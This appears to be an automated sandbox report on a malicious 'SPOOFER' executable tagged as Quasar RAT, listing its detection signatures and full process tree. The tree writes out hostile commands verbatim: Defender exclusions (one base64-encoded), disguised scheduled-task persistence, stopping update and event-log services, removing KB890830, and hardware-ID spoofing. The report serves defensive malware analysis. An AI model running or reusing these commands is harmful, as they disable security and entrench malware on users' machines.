Analysis Overview
SHA256
18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc
Threat Level: Known bad
The file SPOOFER.bin.exe was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Nirsoft
Creates new service(s)
Stops running service(s)
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Maps connected drives based on registry
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-28 18:55
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-28 18:55
Reported
2023-12-28 18:58
Platform
win7-20231215-en
Max time kernel
1s
Max time network
153s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 1PJI-4306
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ClientC" /sc MINUTE /mo 5 /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Volumeid64V" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qDwW3x7lSK.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\Sample Music\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /rl HIGHEST /f
C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe
"C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Volumeid64" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Volumeid64V" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Client" /sc ONLOGON /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ClientC" /sc MINUTE /mo 9 /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 1PJI-4306
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717864HP-TRGT27470MST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317864HP-TRGT27470DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617864HP-TRGT27470FU
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417864HP-TRGT27470FA
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517864HP-TRGT27470SL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817864HP-TRGT27470SG
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217864HP-TRGT27470RV
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17864HP-TRGT27470AB
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517881HP-TRGT15676SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617881HP-TRGT15676FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717881HP-TRGT15676MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317881HP-TRGT15676DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417881HP-TRGT15676FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817881HP-TRGT15676SG
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "driverupdate"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "driverupdate"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517897HP-TRGT3882SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717897HP-TRGT3882MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317897HP-TRGT3882DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617897HP-TRGT3882FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417897HP-TRGT3882FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817897HP-TRGT3882SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217897HP-TRGT3882RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17897HP-TRGT3882AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217881HP-TRGT15676RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17881HP-TRGT15676AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: E599-KPK5
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: E599-KPK5
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: Z7F8-9TBH
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: Z7F8-9TBH
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: UM6T-ZO0D
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: UM6T-ZO0D
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BLKE-U3J4
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BLKE-U3J4
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: EZAT-10UA
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: EZAT-10UA
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: H2H9-L1OA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: H2H9-L1OA
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: N33L-K7M9
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: N33L-K7M9
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: E9LC-7ELM
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: E9LC-7ELM
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: SIC4-96Z2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: SIC4-96Z2
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: CNET-RFTN
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: CNET-RFTN
C:\Windows\System32\cmd.exe
